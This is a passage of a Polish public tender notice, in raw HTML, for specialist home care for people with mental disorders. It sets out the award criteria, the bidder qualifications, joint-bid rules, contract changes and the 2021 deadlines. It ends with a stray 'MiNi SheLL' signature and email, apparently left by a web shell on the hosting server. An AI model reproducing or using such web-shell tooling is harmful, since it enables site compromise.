<br/> CBo cena ofertowa brutto badanej oferty <br/><br/>Uwagi:<br/>- Cena oferty uwzględnia założone przez Wykonawcę realne wskaźniki wzrostu cen i nie podlega zmianie w okresie jej <br/>obowiązywania.<br/>- Osoba składająca oświadczenie świadoma jest odpowiedzialności karnej wynikających z art. 297 Kodeksu <br/>Karnego<br/><br/>6. Punktacja za „Czas reakcji objęcia klienta specjalistyczną usługą opiekuńczą dla osób<br/>z zaburzeniami psychicznymi od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych” będzie liczona jak niżej, gdzie:<br/>Pczr - ilość punktów za czas reakcji objęcia klienta specjalistyczną usługą opiekuńczą dla osób<br/>z zaburzeniami psychicznymi w sytuacjach nagłych<br/>- jeżeli klient zostanie objęty specjalistyczną usługą opiekuńczą dla osób z zaburzeniami psychicznymi w ciągu 11 - 12 godzin od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych – oferta otrzyma – 0 pkt <br/>- jeżeli klient zostanie objęty specjalistyczną usługą opiekuńczą dla osób z zaburzeniami psychicznymi w ciągu 9 - 10 godzin od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych – oferta otrzyma – 20 pkt <br/>- jeżeli klient zostanie objęty specjalistyczną usługą opiekuńczą dla osób z zaburzeniami psychicznymi w ciągu 5 - 8 godzin od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych – oferta otrzyma – 60 pkt<br/>- jeżeli klient zostanie objęty specjalistyczną usługą opiekuńczą dla osób z zaburzeniami psychicznymi do 4 godzin od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych – oferta otrzyma - 100 pkt<br/>Uwagi: <br/>- Przy określeniu czasu reakcji objęcia klienta usługą należy podać pełną godzinę, w przypadku zadeklarowania czasu reakcji<br/>w niepełnych godzinach, podany czas będzie zaokrąglany w górę do pełnych godzin.<br/>- Czas reakcji objęcia klienta usługą w sytuacjach nagłych nie może być dłuższy niż 12 godzin, w przypadku deklaracji dłuższego czasu reakcji oferta Wykonawcy będzie podlegała odrzuceniu.<br/>- Przez sytuacje nagłe Zamawiający rozumie np. nagłe pogorszenie stanu zdrowia, powrót klienta ze szpitala.<br/>- Godziny, o których mowa w ogłoszeniu są godzinami zegarowymi.<br/><br/>7. Uzyskana liczba punktów w poszczególnych kryteriach zostanie przemnożona przez wagę %. Całkowita ilość punktów „P” stanowi sumę iloczynów punktów jakie oferta uzyskała w danym kryterium i wagi procentowej danego kryterium: P= (Pc x 60%) + ( Pczr x 40%)<br/>8. W przypadku kryterium &#34;Cena&#34; oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą z działania jw.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji objęcia klienta specjalistyczną usługą opiekuńczą dla osób z zaburzeniami psychicznymi od chwili zgłoszenia przez Zamawiającego w sytuacjach nagłych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.2 Na podstawie art.112 ust 2 ustawy Pzp , Zamawiający określa warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym - Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie określa warunku udziału w postępowaniu w tym zakresie.<br/><br/>3) sytuacji ekonomicznej lub finansowej -<br/>Zamawiający żąda dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia określonej w rozdz. X ust 2 pkt 1. <br/> <br/>4) zdolności technicznej lub zawodowej-<br/>a) Zamawiający żąda wykazu usług wykonywanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi te zostały wykonane lub są wykonywane, oraz z załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz, którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie – powinny być wystawione w okresie ostatnich 3 miesięcy, określonej w rozdz. X ust. 2 pkt 2 lit „a” <br/><br/>b) Zamawiający żąda wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, lub kierowania robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie dysponowania tymi osobami określone w rozdz. X ust. 2 pkt 2 lit „b” <br/> <br/>Uwaga:<br/>- Jeżeli Wykonawca z uzasadnionej przyczyny nie może złożyć wymaganego przez Zamawiającego podmiotowego środka dowodowego, Wykonawca składa inny podmiotowy środek dowodowy, który w wystarczający sposób potwierdzi spełnienie opisanego przez Zamawiającego warunku udziału w postępowaniu. <br/>- Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast dokumentów , o których mowa w pkt. X mają zastosowanie uregulowania Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 220r w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń , jakich może żądać Zamawiający od Wykonawcy - § 4 ust1,2 i 3 Rozporządzenia j.w. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Dok.potw., że Wykonawca jest ubezp. (…) Za min. poziom zdolności uznane zostanie wykazanie przez Wyk., że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedm. zam. na sumę gwarancyjną nie mniejszą niż 50.000,00 zł (...) 2) Wykaz głównych usług (…)- Za min. poziom zdolności uznane zostanie wykazanie przez Wyk., że:a) wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty co najmniej 1 zamówienie polegające na świadczeniu w miejscu zamieszkania lub pobytu spec. usług op. dla osób z zab. psych. w il. nie mniejszej niż 600 h maks.w skali 12 mc wraz z podaniem jego przedmiotu, dat wykonania/wykonywania i podmiotów, na rzecz których usługi te zostały wykonane/są wykonywane oraz załączy dowody określające, że świadczone w miejscu zam. lub pobytu spec. usługi opiekuńcze zostały wykonane lub są wykonywane należycie.<br/>b) Wykaz osób, skier. przez Wyk. do realizacji zam. publ. (...)<br/>Za min. poziom zdolności uznane zostanie wykazanie przez Wyk., że dysponuje osobami zdolnymi do realizacji zamówienia, tj. co najmniej 5 osobami, posiadającymi kwalifikacje określone wymaganiami Roz. Min.Pol.Społ. w spr. Spec. usług op. z dnia 22.09.2005r. zmieniające rozp. w spr. Spec. usł. op.), tj. wszystkie osoby przedstawione w wykazie posiadają co najmniej następujące kwalifikacje: 1) Osoby świadczące spec. usługi opiekuńcze dla osób z zab. psych. muszą posiadać kwalifikacje do wykonania zawodu: prac. socj., psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnospr., opiekunki środowiskowej, spec. w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone spec. usługi. 2) Os. Świad. spec. usługi dla osób z zab. psych. muszą posiadać co najmniej półroczny staż pracy w jednej z jedn.:<br/>a) szpitalu psych., b) jedn. org. pom. Społ. dla osób z zab. psych.,<br/>c) placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym,<br/>d) ośrodku terapeutyczno – edukacyjno - wychowawczym, e) zakładzie rehabilitacji,f) innej jednostce niż wymienione w pkt a) - e), świadczącej spec. usługi opiekuńcze dla osób z zaburzeniami psychicznymi.<br/>3) muszą posiadać przeszkolenie i doświadczenie w zakresie:<br/>- umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań, - kształtowania nawyków celowej aktywności,<br/>- prowadzenia treningu zachowań społecznych. <br/>4) W uzasadnionych przypadkach spec. usługi mogą być świadczone przez osoby, które zdobywają lub podnoszą wymagane kwalifikacje zawodowe:<br/>prac. socj., psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej, opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi, posiadają co najmniej roczny staż pracy w jednostkach:<br/>a) szpitalu psychiatrycznym, b) jedn. organizacyjnej pomocy społecznej dla osób z zab. psych., c) placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zab. rozwoju lub upośledzeniem umysłowym<br/>d) oś. terapeutyczno – edukacyjno - wychowawczym,<br/>e) zakładzie rehabilitacji,<br/>f) innej jednostce niż wymienione w pkt a) - e), świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi<br/>i mają zapewnioną możliwość konsultacji z osobami świadczącymi spec.usługi, posiadającymi wymagane kwalifikacje oraz mają przeszkolenie i doświadczenie w zakresie umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań, kształtowania nawyków celowej aktywności, prowadzenia treningu zachowań społecznych dla osób świadczących usługi.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego - nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/> 3.2 Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. ( art.117.2 uPzp).<br/> 3.3 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały określone) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonują usługi do realizacji których te zdolności są wymagane. W przypadku, o którym mowa w ust. 3.2 i 3.3 Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które z usług wykonają poszczególni Wykonawcy.<br/>Uwaga: <br/>Pełnomocnictwo, o którym mowa powyżej (pkt.3.1) może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/> a) Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika).<br/> b) W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia, to znaczy, że:<br/> 1) Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/> 2) Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>4. Udostępnienie zasobów.<br/> 4.1 Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu na zasadach opisanych w art. 118-123 ustawy Pzp, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych. Podmiot na zasoby, którego wykonawca powołuje się w celu wykazania spełnienia warunków udziału w postępowaniu nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp.<br/> 4.2 W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonują usługi, do realizacji których te zdolności są wymagane. (art. 118.2 uPzp) Szczegółowy opis w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany umowy<br/>1. Wszelkie zmiany treści umowy mogą być dokonywane wyłącznie w formie pisemnej pod rygorem nieważności.<br/>2. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku:<br/>a) zmiany terminu wykonania zamówienia na skutek wystąpienie siły wyższej rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie jego zobowiązania w całości lub części. W razie wystąpienia siły wyższej Strony Umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej,<br/>b) zmiany podatku VAT:<br/>- w przypadku zwiększenia stawki podatku VAT: cena jednostkowa brutto określona w § 9 pkt 1 umowy zostanie odpowiednio powiększona w odniesieniu do ceny zadeklarowanej w druku ofertowym. Maksymalna nominalna wartość umowy może ulec zwiększeniu,<br/>- w przypadku zmniejszenia stawki podatku VAT: cena jednostkowa brutto określona w § 9 pkt 1 umowy zostanie odpowiednio pomniejszona w odniesieniu do ceny zadeklarowanej w druku ofertowym. Maksymalna nominalna wartość umowy może ulec zmniejszeniu,<br/>c) zmiany przepisów prawa istotnych dla postanowień zawartej umowy.<br/>3. Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony. Przy czym w przypadku zmiany NIPu, REGONu, nr konta bankowego wystarczającym jest poinformowanie drugiej strony o tym fakcie w formie pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-17 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mops-dg.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-17 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com